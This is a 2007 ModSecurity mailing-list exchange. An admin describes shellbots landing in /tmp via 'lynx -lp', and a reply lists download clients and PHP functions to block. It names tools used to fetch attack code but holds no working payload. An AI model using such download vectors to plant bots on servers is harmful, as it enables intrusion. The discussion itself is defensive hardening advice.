[Modsecurity] Shellbot installation via lynx -lp

Michael Shinn mike at gotroot.com
Fri Sep 14 15:40:51 EDT 2007 

Its an interesting one.  Do you have all the other download clients
covered?  (wget, ftp, ncftp, rsync, curl, scp, rcp, etc.)

It could also just be an internal function call in php (furl_open,
etc.).  Do you have all the bad HP functions turned off?  (system, exec,
etc.)

Also, if you have the outbound firewall setup, why not stop all
connections to ports 80 and 443 outbound?

On Thu, 2007-09-13 at 13:43 -0400, admin at efastservers.com wrote:
> There seems to a new way of installating shellbots into the /tmp
> directory on the server and im not positive on how it’s being done.
> 
> I’v noticed this on 2 of my client’s servers in the past few weeks.
> 
>  
> 
> What strange about it is mod_security has not caught it. Now we
> install a fairly complicated version of the rules on our client’s
> servers. It include lynx, at least 3 variations and in /usr/bin/lynx
> is chmod 750 yet it seems that this is how its being installed at the
> moment.
> 
>  
> 
> I cant understand how lynx –lp is being executed. If its chmod 750
> nobody from the internet can execute the command. Why do I think its
> lynx –lp? Because I killed a pid that was executing lynx –lp as the
> user nobody.
> 
>  
> 
> They did not get far. The firewall denies all outbound connections and
> these bots usually try to make a connection outbound on port 6667.
> Even so, im frustrated as hell trying to find out how it’s being done.
> I searched all the user logs using egrep and could not find an
> occurrence of lynx –lp but it was definitely there and the firewall
> did tell me that it was a suspicious process running.
> 
>  
> 
> I’m also surprised that our mod_sec rules which is about 57k did not
> catch it. If it was used as a cmd= or whatever both cmd and lynx does
> exist in the rules and the fact that lynx, wget, scp etc is all chmod
> 750 is a mystery too me.
> 
>  
> 
> Unless its being installed some other way other than via a malicious
> url I have no idea how its getting dumped to /tmp.
> 
>  
> 
> Anyone?
> 
> 
> _______________________________________________
> Modsecurity mailing list
> Modsecurity at gotroot.com
> http://lists.gotroot.com/mailman/listinfo/modsecurity
-- 
Michael T. Shinn                                    KeyID:0xDAE2EC86
Key Fingerprint:  1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86
SANS Advisory Board Member
  
Got Root?  http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls:  http://troubleshootingfirewalls.com

More information about the Modsecurity mailing list